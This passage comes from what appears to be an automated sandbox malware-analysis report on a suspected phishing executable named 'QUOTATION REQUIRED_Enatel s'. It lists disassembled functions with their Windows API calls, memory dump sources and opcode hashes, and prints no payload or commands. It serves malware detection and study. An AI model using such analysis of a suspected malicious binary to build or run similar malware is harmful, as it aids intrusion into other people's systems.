                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: c7348e0f35436dac628a5b7c03b89d58dfb056b3b5b350b5f1f1d47ce613fbdb
                                                                                                                    • Instruction ID: 952f57c79e53d5149b445023a39178fa469727c71a09fc32da00d247bb16addc
                                                                                                                    • Opcode Fuzzy Hash: c7348e0f35436dac628a5b7c03b89d58dfb056b3b5b350b5f1f1d47ce613fbdb
                                                                                                                    • Instruction Fuzzy Hash: 28F0B432A0222466DB215F62AC85B5A3F89BF417B1B1C4111BE15BA181CA30F80076F0
                                                                                                                    Function 00F43820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00FE1444,?,00F2FDF5,?,?,00F1A976,00000010,00FE1440,00F113FC,?,00F113C6,?,00F11129), ref: 00F43852
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: a98cc05d9228173c3196294e2abbb4fdff801c18011f8d3dc34de275684509e2
                                                                                                                    • Instruction ID: e8eb92896be6bef51758e1257afff02084b09f677db6c11d3bb1b7ad957b3ca4
                                                                                                                    • Opcode Fuzzy Hash: a98cc05d9228173c3196294e2abbb4fdff801c18011f8d3dc34de275684509e2
                                                                                                                    • Instruction Fuzzy Hash: 21E02B3390022496E73127779C00B9BBF49AF427B0F090020BC1496581DB21ED01B5F0
                                                                                                                    Function 00F14F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(?,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14F6D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: 4a478c7643de6a7031e6602555a8e9360e648a4bdec607933c3f65389fcd324b
                                                                                                                    • Instruction ID: 13182f07b8602efc9692877a736f6d7d68c45fe31b37229d12ec0676fe61c02a
                                                                                                                    • Opcode Fuzzy Hash: 4a478c7643de6a7031e6602555a8e9360e648a4bdec607933c3f65389fcd324b
                                                                                                                    • Instruction Fuzzy Hash: 8EF0A971505302CFCB348F20D8A08A2BBE4EF50329320897EE1EA87620C731A889EF00
                                                                                                                    Function 00F7CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00F5EE51,00FD3630,00000002), ref: 00F7CD26
                                                                                                                      • Part of subcall function 00F7CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00F7CD19,?,?,?), ref: 00F7CC59
                                                                                                                      • Part of subcall function 00F7CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00F7CD19,?,?,?,?,00F5EE51,00FD3630,00000002), ref: 00F7CC6E
                                                                                                                      • Part of subcall function 00F7CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00F7CD19,?,?,?,?,00F5EE51,00FD3630,00000002), ref: 00F7CC7A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Pointer$Write
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3847668363-0
                                                                                                                    • Opcode ID: 1bea129bff30838affd1c8c7c2f4e2d6f73fc62a201188c579f6005a1647e9ac
                                                                                                                    • Instruction ID: 9b2750981542fc416f74ec5af59656b5ab833b74868b5213b572ef73017c343a
                                                                                                                    • Opcode Fuzzy Hash: 1bea129bff30838affd1c8c7c2f4e2d6f73fc62a201188c579f6005a1647e9ac
                                                                                                                    • Instruction Fuzzy Hash: 3CE06576500704EFC7219F46DD01CAABBF9FF85760710852FE955C2110D775AA14EBA1
                                                                                                                    Function 00F12DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F12DC4
                                                                                                                      • Part of subcall function 00F16B57: _wcslen.LIBCMT ref: 00F16B6A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongNamePath_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 541455249-0
                                                                                                                    • Opcode ID: 5fb011c537c05601279d91ccdec769288b55cd5a92672991047a904489c11ad5
                                                                                                                    • Instruction ID: cffb4ed40f32eab118de55ed1662f3ecb57b61821ce1c9b91e484dfc01664543
                                                                                                                    • Opcode Fuzzy Hash: 5fb011c537c05601279d91ccdec769288b55cd5a92672991047a904489c11ad5
                                                                                                                    • Instruction Fuzzy Hash: E7E0CD726041245BC710D2589C05FEA77DDDFC8790F050071FD09D7248D964AD849590
                                                                                                                    Function 00F12B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F13837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F13908
                                                                                                                      • Part of subcall function 00F1D730: GetInputState.USER32 ref: 00F1D807
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F12B6B
                                                                                                                      • Part of subcall function 00F130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F1314E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3667716007-0
                                                                                                                    • Opcode ID: 2eec9435dbaf40af9bb6a6cc919fc2087343bcc295c88a77c6adcba8c22bf079
                                                                                                                    • Instruction ID: 2d276100dc56e54b0336c4a1277ebf7dfadf9d06d7458ef63c03e0ea215a5add
                                                                                                                    • Opcode Fuzzy Hash: 2eec9435dbaf40af9bb6a6cc919fc2087343bcc295c88a77c6adcba8c22bf079
                                                                                                                    • Instruction Fuzzy Hash: 2DE0863270824807CA08FB76AC525EDB7999BD6365F40153EF142472A3CE7889C56392
                                                                                                                    Function 015FD618 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 015FD623
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                    • Instruction ID: 31749120d5ba787c7247acead042c085db70365d5b2281acccc2e99a9a659cf0
                                                                                                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                    • Instruction Fuzzy Hash: A6E08C30905208EBDB10CAE88905ABD73B8BB4A320F104A58AA0ECB280D5B19A00D658
                                                                                                                    Function 00F5039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00F50704,?,?,00000000,?,00F50704,00000000,0000000C), ref: 00F503B7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 2f028c707127e42d129ba3a64f74663ee526435c6bd86a1f45e53123dc71f136
                                                                                                                    • Instruction ID: cc65f9007837b5d5c8d9937631f60d0e0cfda1da97003ba0cc58a6e7fce7fd34
                                                                                                                    • Opcode Fuzzy Hash: 2f028c707127e42d129ba3a64f74663ee526435c6bd86a1f45e53123dc71f136
                                                                                                                    • Instruction Fuzzy Hash: E0D06C3214010DBBDF028F84DD06EDA3BAAFB48714F014000BE1856020C736E821AB90
                                                                                                                    Function 015FD5E8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 015FD5F3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                    • Instruction ID: fe88659276e638421f08445af5f58591c9b716e8764a1760aed5b3b5632f2706
                                                                                                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                    • Instruction Fuzzy Hash: 68D0A73090620CEBCB10DFF89D0C9DD77B8E705321F004758FE19C7280D53199009750
                                                                                                                    Function 00F11CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00F11CBC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoParametersSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3098949447-0
                                                                                                                    • Opcode ID: bcd6056206b98916a7fbed5586f35c4b4bd606381c30128d4e7e52239124ea99
                                                                                                                    • Instruction ID: f2ee9df6c36abc5b878e8626d54179be5231e6b1fe2449ae0ede40d77ff97410
                                                                                                                    • Opcode Fuzzy Hash: bcd6056206b98916a7fbed5586f35c4b4bd606381c30128d4e7e52239124ea99
                                                                                                                    • Instruction Fuzzy Hash: DDC09B3528034C9FF2144780BD8AF107754B348B00F484001F6095D5F3D7B11810F690
                                                                                                                    Function 00F8744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F15745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00F1949C,?,00008000), ref: 00F15773
                                                                                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 00F876DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1214770103-0
                                                                                                                    • Opcode ID: dd9415f8d5fcbb2faa88134e91b88289d8fae17577eef1ceb546935aa3afb761
                                                                                                                    • Instruction ID: 07a1c947f93e6cfd2705d5d25d5f31d82829f5f4e6d6931c15c1139f7ac60596
                                                                                                                    • Opcode Fuzzy Hash: dd9415f8d5fcbb2faa88134e91b88289d8fae17577eef1ceb546935aa3afb761
                                                                                                                    • Instruction Fuzzy Hash: AE81A1306087019FCB14FF28C891BA9B7E1AF88310F18451DF8995B392DB34ED85EB92
                                                                                                                    Function 015FEFF4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 015FF009
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                    • Instruction ID: 2066a4ad88baf050f72926bc7cedad3c09be1c644f3e995bce79905604715cf3
                                                                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                    • Instruction Fuzzy Hash: A0E0BF7594010DEFDB10DFA4D5496DD7BB4FF04301F1005A5FE05D7681DB309E548A62
                                                                                                                    Function 00F16246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNELBASE(?,?,00000000,00F524E0), ref: 00F16266
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: 26689c2b753c11fdad8bdf87763e0be21164b00856e2b0a3b39daf8d73e5c15a
                                                                                                                    • Instruction ID: e0b29cc3e4827060f80e3a9edcd74c7374e3587eb09dab56393bfe84fd308156
                                                                                                                    • Opcode Fuzzy Hash: 26689c2b753c11fdad8bdf87763e0be21164b00856e2b0a3b39daf8d73e5c15a
                                                                                                                    • Instruction Fuzzy Hash: 69E09275800B01DEDB314F1AE804492FBE5FEE13613204A2ED0E592660D7B05886EF50
                                                                                                                    Function 015FEFF8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 015FF009
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction ID: 376e640bf60d01f0c8bc48bc08eb984dc1ac6236aae90da2aabdfc90a66b08fc
                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction Fuzzy Hash: 99E0E67594010DDFDB00DFB4D54969D7BF4FF04301F100165FD01D2281D6309D508A72

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00FA9576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00FA961A
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FA965B
                                                                                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00FA969F
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FA96C9
                                                                                                                    • SendMessageW.USER32 ref: 00FA96F2
                                                                                                                    • GetKeyState.USER32(00000011), ref: 00FA978B
                                                                                                                    • GetKeyState.USER32(00000009), ref: 00FA9798
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FA97AE
                                                                                                                    • GetKeyState.USER32(00000010), ref: 00FA97B8
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FA97E9
                                                                                                                    • SendMessageW.USER32 ref: 00FA9810
                                                                                                                    • SendMessageW.USER32(?,00001030,?,00FA7E95), ref: 00FA9918
                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00FA992E
                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00FA9941
                                                                                                                    • SetCapture.USER32(?), ref: 00FA994A
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00FA99AF
                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00FA99BC
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FA99D6
                                                                                                                    • ReleaseCapture.USER32 ref: 00FA99E1
                                                                                                                    • GetCursorPos.USER32(?), ref: 00FA9A19
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FA9A26
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00FA9A80
                                                                                                                    • SendMessageW.USER32 ref: 00FA9AAE
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00FA9AEB
                                                                                                                    • SendMessageW.USER32 ref: 00FA9B1A
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00FA9B3B
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00FA9B4A
                                                                                                                    • GetCursorPos.USER32(?), ref: 00FA9B68
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FA9B75
                                                                                                                    • GetParent.USER32(?), ref: 00FA9B93
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00FA9BFA
                                                                                                                    • SendMessageW.USER32 ref: 00FA9C2B
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00FA9C84
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00FA9CB4
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00FA9CDE
                                                                                                                    • SendMessageW.USER32 ref: 00FA9D01
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00FA9D4E
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00FA9D82
                                                                                                                      • Part of subcall function 00F29944: GetWindowLongW.USER32(?,000000EB), ref: 00F29952
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FA9E05
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                                    • API String ID: 3429851547-4164748364
                                                                                                                    • Opcode ID: 64c14a22b02890a90f9eda3c6bddd94b4606619fef7336861c50f179640e84c8
                                                                                                                    • Instruction ID: 728eb95646aea594809633cc1beb90c9910b4bffcde379f9155ba346778ea291
                                                                                                                    • Opcode Fuzzy Hash: 64c14a22b02890a90f9eda3c6bddd94b4606619fef7336861c50f179640e84c8
                                                                                                                    • Instruction Fuzzy Hash: 774281B5608245AFD724CF24CC84EAABBE5FF4A320F140629F559873A1D7B1D850EF91
                                                                                                                    Function 00FA4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00FA48F3
                                                                                                                    • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00FA4908
                                                                                                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00FA4927
                                                                                                                    • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00FA494B
                                                                                                                    • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00FA495C
                                                                                                                    • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00FA497B
